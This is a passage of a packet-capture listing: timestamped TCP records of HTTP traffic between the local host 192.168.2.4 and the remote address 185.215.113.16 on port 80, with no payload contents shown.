Nov 30, 2024 04:06:18.639981031 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.640024900 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.640067101 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.640187025 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.642635107 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.642683029 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.642735958 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.642779112 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.645373106 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.645426035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.645484924 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.645525932 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.648046017 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.648089886 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.648132086 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.648174047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.650790930 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.650836945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.650872946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.650918007 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.653548002 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.653594017 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.653598070 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.653639078 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.656234026 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.656291008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.656420946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.656491041 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.658950090 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.658992052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.659023046 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.659163952 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.661673069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.661720991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.661789894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.661839008 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.664271116 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.664319038 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.664378881 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.664431095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.666956902 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.667013884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.667052031 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.667094946 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.669675112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.669722080 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.669790983 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.669840097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.672367096 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.672420025 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.672462940 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.672502995 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.675071955 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.675113916 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.675184965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.675235033 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.677784920 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.677830935 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.677855968 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.677896976 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.680495024 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.680547953 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.680582047 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.680640936 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.683180094 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.683235884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.683283091 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.683330059 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.685877085 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.685920000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.685977936 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.686022043 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.688613892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.688672066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.688710928 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.688754082 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.691317081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.691364050 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.691426992 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.691476107 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.693983078 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.694035053 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.694108963 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.694154978 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.696693897 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.696738005 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.696764946 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.696815014 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.699385881 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.699434042 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.699486017 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.699542046 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.702106953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.702177048 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.702220917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.702261925 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.704807997 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.704853058 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.704916954 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.704973936 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.707503080 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.707549095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.707619905 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.707673073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.710206032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.710254908 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.710319996 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.710369110 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.712932110 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.712981939 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.713036060 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.713084936 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.715631008 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.715676069 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.715681076 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.715733051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.718341112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.718396902 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.718400955 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.718442917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.721019030 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.721071959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.721103907 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.721153975 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.723736048 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.723790884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.723849058 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.723895073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.726445913 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.726557970 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.726564884 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.726653099 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.729192972 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.729245901 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.729299068 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.729346037 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.731858015 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.731915951 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.731959105 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.732001066 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.734539032 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.734585047 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.734690905 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.734730959 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.737279892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.737334967 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.737401962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.737451077 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.739940882 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.739994049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.810446978 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.810497999 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.810586929 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.810638905 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.811388016 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.811434984 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.811475039 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.811563015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.813311100 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.813360929 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.813415051 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.813451052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.815136909 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.815186977 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.815238953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.815285921 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.816987991 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.817048073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.817099094 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.817143917 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.818841934 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.818891048 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.818969965 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.819010019 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.820655107 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.820707083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.820775986 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.820826054 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.822443962 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.822489023 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.822560072 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.822607040 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.824251890 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.824306965 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.824372053 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.824424028 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.826008081 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.826057911 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.826123953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.826188087 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.827759981 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.827810049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.827863932 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.827914000 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.829528093 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.829585075 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.829626083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.829677105 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.831233978 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.831283092 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.831362963 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.831403017 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.832952976 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.833003044 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.833054066 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.833098888 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.834681988 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.834727049 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.834806919 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.834856987 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.836374998 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.836421013 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.836491108 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.836535931 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.838047981 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.838099003 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.838135004 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.838192940 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.839693069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.839739084 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.839809895 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.839867115 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.841352940 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.841403961 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.841476917 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.841525078 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.843027115 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.843079090 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.843151093 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.843203068 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.844654083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.844701052 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.844724894 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.844758987 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.846291065 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.846353054 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.846380949 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.846419096 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.847912073 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.847963095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.848020077 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.848074913 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.849502087 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.849554062 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.849621058 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.849661112 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.851142883 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.851195097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.851246119 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.851303101 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.852097034 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.852144957 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.852226973 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.852267027 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.853089094 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.853138924 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.853223085 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.853269100 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.854015112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.854063034 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.854125023 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.854171991 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.854989052 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.855036974 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.855074883 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.855123043 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.855959892 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.856009960 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.856069088 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.856112003 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.856894970 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.856940985 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.856997967 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.857053995 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.857851982 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.857904911 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.857939005 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.857989073 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.858844995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.858894110 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.858971119 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.859025002 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.859780073 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.859822035 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.859891891 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.859937906 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.860744953 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.860791922 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.860852957 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.860897064 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.861718893 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.861769915 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.861824989 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.861881971 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.862668991 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.862715960 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.862776995 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.862822056 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.863625050 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.863672972 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.863744974 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.863799095 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.864592075 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.864636898 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.864689112 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.864733934 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.865494013 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.865540028 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.865609884 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.865654945 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.866470098 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.866518021 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.866578102 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.866646051 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.867417097 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.867468119 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.867532015 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.867582083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.868391037 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.868442059 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.868555069 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.868604898 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.869339943 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.869383097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.869430065 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.869478941 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.870297909 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.870356083 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.870394945 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.870485067 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.871237993 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.871289015 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.871355057 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.871397018 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.872216940 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.872267962 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.872322083 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.872368097 CET	49782	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:18.873162985 CET	80	49782	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:18.873209000 CET	49782	80	192.168.2.4	185.215.113.16
